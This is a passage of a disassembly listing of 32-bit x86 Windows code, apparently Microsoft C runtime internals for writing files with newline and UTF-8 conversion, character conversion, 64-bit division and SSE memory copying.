push edi
push edi
push edi
call sub_402F39
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CDEF: ; CODE XREF: sub_40CD41+86�j
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40CE1E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_40CE38
; ---------------------------------------------------------------------------
loc_40CE1E: ; CODE XREF: sub_40CD41+BF�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_40CE38: ; CODE XREF: sub_40CD41+DB�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40CE50
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_40CE4A: ; CODE XREF: sub_40CD41+34�j
; sub_40CD41+AC�j
call __SEH_epilog4
retn
sub_40CD41 endp
; =============== S U B R O U T I N E =======================================
sub_40CE50 proc near ; CODE XREF: sub_40CD41+FE�p
; DATA XREF: J8@F_7_S:004217B8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40CE50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
sub_40CE5A proc near ; CODE XREF: sub_40D420+9A�p
; sub_4105A7+BB�p
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_40CE96
xor eax, eax
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CE96: ; CODE XREF: sub_40CE5A+33�j
cmp eax, esi
jnz short loc_40CEC1
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CEC1: ; CODE XREF: sub_40CE5A+3E�j
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 28h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
jz short loc_40CEF8
cmp cl, 1
jnz short loc_40CF2B
loc_40CEF8: ; CODE XREF: sub_40CE5A+97�j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_40CF2B
call sub_4057E6
xor esi, esi
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_40D400
; ---------------------------------------------------------------------------
loc_40CF2B: ; CODE XREF: sub_40CE5A+9C�j
; sub_40CE5A+A9�j
test byte ptr [eax+4], 20h
jz short loc_40CF40
push 2
push 0
push 0
push esi
call sub_40CCBE
add esp, 10h
loc_40CF40: ; CODE XREF: sub_40CE5A+D5�j
push esi
call sub_40D540
test eax, eax
pop ecx
jz loc_40D145
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40D145
call sub_40539D
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call ds:dword_41D118
test eax, eax
jz loc_40D145
test esi, esi
jz short loc_40CF93
cmp [ebp+518h+var_56D], 0
jz loc_40D145
loc_40CF93: ; CODE XREF: sub_40CE5A+12D�j
call ds:dword_41D11C
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40D3B2
and [ebp+518h+var_574], 0
jmp short loc_40CFBC
; ---------------------------------------------------------------------------
loc_40CFB9: ; CODE XREF: sub_40CE5A+2E0�j
mov esi, [ebp+518h+var_58C]
loc_40CFBC: ; CODE XREF: sub_40CE5A+15D�j
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40D0CD
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40CA36
test eax, eax
pop ecx
jnz short loc_40CFFB
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
jmp short loc_40D02B
; ---------------------------------------------------------------------------
loc_40CFFB: ; CODE XREF: sub_40CE5A+185�j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40D3A8
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
inc esi
inc [ebp+518h+var_574]
loc_40D02B: ; CODE XREF: sub_40CE5A+19F�j
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call ds:dword_41D138
mov esi, eax
test esi, esi
jz loc_40D3A8
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
cmp [ebp+518h+var_590], 0
jz loc_40D131
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
cmp [ebp+518h+var_568], 1
jl loc_40D3A8
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40D131
; ---------------------------------------------------------------------------
loc_40D0CD: ; CODE XREF: sub_40CE5A+167�j
cmp al, 1
jz short loc_40D0D5
cmp al, 2
jnz short loc_40D0F0
loc_40D0D5: ; CODE XREF: sub_40CE5A+275�j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40D0F0: ; CODE XREF: sub_40CE5A+279�j
cmp al, 1
jz short loc_40D0F8
cmp al, 2
jnz short loc_40D131
loc_40D0F8: ; CODE XREF: sub_40CE5A+298�j
push [ebp+518h+var_56C]
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40D131
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40D131: ; CODE XREF: sub_40CE5A+232�j
; sub_40CE5A+271�j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_40CFB9
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D145: ; CODE XREF: sub_40CE5A+EF�j
; sub_40CE5A+FC�j ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40D378
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40D1F6
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D174: ; CODE XREF: sub_40CE5A+395�j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D181: ; CODE XREF: sub_40CE5A+354�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D1B0
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40D1A1
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40D1A1: ; CODE XREF: sub_40CE5A+33B�j
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40D181
loc_40D1B0: ; CODE XREF: sub_40CE5A+32D�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40D174
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D1F6: ; CODE XREF: sub_40CE5A+305�j
cmp [ebp+518h+var_56D], 2
jnz loc_40D29D
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D20F: ; CODE XREF: sub_40CE5A+438�j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D21A: ; CODE XREF: sub_40CE5A+3F7�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D253
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40D241
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40D241: ; CODE XREF: sub_40CE5A+3D8�j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40D21A
loc_40D253: ; CODE XREF: sub_40CE5A+3C6�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40D20F
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D29D: ; CODE XREF: sub_40CE5A+3A0�j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40D3D9
loc_40D2AC: ; CODE XREF: sub_40CE5A+516�j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40D2BF: ; CODE XREF: sub_40CE5A+497�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D2F3
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40D2E2
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40D2E2: ; CODE XREF: sub_40CE5A+47C�j
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40D2BF
loc_40D2F3: ; CODE XREF: sub_40CE5A+46B�j
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call ds:dword_41D138
mov edi, eax
cmp edi, esi
jz short loc_40D39F
loc_40D326: ; CODE XREF: sub_40CE5A+4F6�j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D354
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40D326
jmp short loc_40D35D
; ---------------------------------------------------------------------------
loc_40D354: ; CODE XREF: sub_40CE5A+4EF�j
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D35D: ; CODE XREF: sub_40CE5A+4F8�j
cmp edi, esi
jg short loc_40D3A8
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40D2AC
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D378: ; CODE XREF: sub_40CE5A+2F3�j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call ds:dword_41D088
test eax, eax
jz short loc_40D39F
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D39F: ; CODE XREF: sub_40CE5A+21A�j
; sub_40CE5A+25B�j ...
call ds:dword_41D0F0
mov [ebp+518h+var_56C], eax
loc_40D3A8: ; CODE XREF: sub_40CE5A+199�j
; sub_40CE5A+1AF�j ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40D405
mov edi, [ebp+518h+var_588]
loc_40D3B2: ; CODE XREF: sub_40CE5A+153�j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40D3D9
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40D3CE
call sub_4057D3
mov dword ptr [eax], 9
jmp short loc_40D3F9
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40CE5A+565�j
push [ebp+518h+var_56C]
call sub_4057F9
pop ecx
jmp short loc_40D400
; ---------------------------------------------------------------------------
loc_40D3D9: ; CODE XREF: sub_40CE5A+314�j
; sub_40CE5A+3AF�j ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40D3EE
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40D3EE
xor eax, eax
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40CE5A+586�j
; sub_40CE5A+58E�j
call sub_4057D3
mov dword ptr [eax], 1Ch
loc_40D3F9: ; CODE XREF: sub_40CE5A+572�j
call sub_4057E6
mov [eax], esi
loc_40D400: ; CODE XREF: sub_40CE5A+CC�j
; sub_40CE5A+57D�j
or eax, 0FFFFFFFFh
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D405: ; CODE XREF: sub_40CE5A+553�j
sub eax, [ebp+518h+var_580]
loc_40D408: ; CODE XREF: sub_40CE5A+592�j
; sub_40CE5A+5A9�j
pop edi
pop ebx
loc_40D40A: ; CODE XREF: sub_40CE5A+37�j
; sub_40CE5A+62�j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 518h
leave
retn
sub_40CE5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4067D6+CB�p
; sub_4067D6+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4217C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D44F
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40D447: ; CODE XREF: sub_40D420+5C�j
or eax, 0FFFFFFFFh
jmp loc_40D4EC
; ---------------------------------------------------------------------------
loc_40D44F: ; CODE XREF: sub_40D420+12�j
xor edi, edi
cmp eax, edi
jl short loc_40D45D
cmp eax, ds:dword_433C84
jb short loc_40D47E
loc_40D45D: ; CODE XREF: sub_40D420+33�j
; sub_40D420+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40D447
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40D420+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D45D
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D4C7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D4C7: ; CODE XREF: sub_40D420+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D4DD: ; CODE XREF: sub_40D420+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D4F2
mov eax, [ebp+var_1C]
loc_40D4EC: ; CODE XREF: sub_40D420+2A�j
call __SEH_epilog4
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
sub_40D4F2 proc near ; CODE XREF: sub_40D420+C4�p
; DATA XREF: J8@F_7_S:004217D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40D4F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D4FC proc near ; CODE XREF: sub_4067D6+9C�p
; sub_409C8D+58�p ...
arg_0 = dword ptr 4
inc ds:dword_425FC8
push 1000h
call sub_40773A
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40D525
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40D536
; ---------------------------------------------------------------------------
loc_40D525: ; CODE XREF: sub_40D4FC+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40D536: ; CODE XREF: sub_40D4FC+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40D4FC endp
; =============== S U B R O U T I N E =======================================
sub_40D540 proc near ; CODE XREF: sub_4067D6+91�p
; sub_40871B+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D557
call sub_4057D3
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D557: ; CODE XREF: sub_40D540+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40D566
cmp eax, ds:dword_433C84
jb short loc_40D582
loc_40D566: ; CODE XREF: sub_40D540+1C�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40D582: ; CODE XREF: sub_40D540+24�j
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40D540 endp
; =============== S U B R O U T I N E =======================================
sub_40D59E proc near ; CODE XREF: sub_407979:loc_40799C�p
push esi
push edi
xor edi, edi
loc_40D5A2: ; CODE XREF: sub_40D59E+1A�j
lea esi, off_423F80[edi]
push dword ptr [esi]
call sub_405127
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_40D5A2
pop edi
pop esi
retn
sub_40D59E endp
; =============== S U B R O U T I N E =======================================
sub_40D5BD proc near ; CODE XREF: sub_4069D7+554�p
mov eax, ds:dword_423064
or eax, 1
xor ecx, ecx
cmp ds:dword_426420, eax
setz cl
mov eax, ecx
retn
sub_40D5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5D3 proc near ; CODE XREF: sub_40D732+12�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40D5F9
cmp edi, ebx
jbe short loc_40D5F9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D5F5
mov [eax], ebx
loc_40D5F5: ; CODE XREF: sub_40D5D3+1E�j
; sub_40D5D3+EC�j ...
xor eax, eax
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D5F9: ; CODE XREF: sub_40D5D3+13�j
; sub_40D5D3+17�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D603
or dword ptr [eax], 0FFFFFFFFh
loc_40D603: ; CODE XREF: sub_40D5D3+2B�j
cmp edi, 7FFFFFFFh
jbe short loc_40D626
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
loc_40D622: ; CODE XREF: sub_40D5D3+CC�j
; sub_40D5D3+D5�j
mov eax, esi
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D626: ; CODE XREF: sub_40D5D3+36�j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40D6D1
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40D67D
cmp esi, ebx
jz short loc_40D65A
cmp edi, ebx
jbe short loc_40D65A
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
loc_40D65A: ; CODE XREF: sub_40D5D3+76�j
; sub_40D5D3+7A�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
call sub_4057D3
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40D678
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40D678: ; CODE XREF: sub_40D5D3+24�j
; sub_40D5D3+51�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D67D: ; CODE XREF: sub_40D5D3+72�j
cmp esi, ebx
jz short loc_40D6AF
cmp edi, ebx
ja short loc_40D6AD
loc_40D685: ; CODE XREF: sub_40D5D3+141�j
; sub_40D5D3+149�j ...
call sub_4057D3
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40D622
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D622
; ---------------------------------------------------------------------------
loc_40D6AD: ; CODE XREF: sub_40D5D3+B0�j
mov [esi], al
loc_40D6AF: ; CODE XREF: sub_40D5D3+AC�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D6BC
mov dword ptr [eax], 1
loc_40D6BC: ; CODE XREF: sub_40D5D3+E1�j
; sub_40D5D3+12A�j ...
cmp [ebp+var_4], bl
jz loc_40D5F5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D5F5
; ---------------------------------------------------------------------------
loc_40D6D1: ; CODE XREF: sub_40D5D3+64�j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call ds:dword_41D138
cmp eax, ebx
jz short loc_40D703
cmp [ebp+arg_4], ebx
jnz loc_40D65A
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40D6BC
mov [ecx], eax
jmp short loc_40D6BC
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: sub_40D5D3+11A�j
call ds:dword_41D0F0
cmp eax, 7Ah
jnz loc_40D65A
cmp esi, ebx
jz loc_40D685
cmp edi, ebx
jbe loc_40D685
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
jmp loc_40D685
sub_40D5D3 endp
; =============== S U B R O U T I N E =======================================
sub_40D732 proc near ; CODE XREF: sub_4069D7+487�p
; sub_4069D7+8B1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D5D3
add esp, 14h
retn
sub_40D732 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D750 proc near ; CODE XREF: sub_4069D7+786�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40D781
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40D7C8
; ---------------------------------------------------------------------------
loc_40D781: ; CODE XREF: sub_40D750+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40D78F: ; CODE XREF: sub_40D750+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40D78F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40D7BD
cmp edx, [esp+4+arg_4]
ja short loc_40D7BD
jb short loc_40D7C6
cmp eax, [esp+4+arg_0]
jbe short loc_40D7C6
loc_40D7BD: ; CODE XREF: sub_40D750+5D�j
; sub_40D750+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40D7C6: ; CODE XREF: sub_40D750+65�j
; sub_40D750+6B�j
xor ebx, ebx
loc_40D7C8: ; CODE XREF: sub_40D750+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40D750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40D86C+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_40D805
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D7E5+18�j
; sub_40D7E5+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_40D805
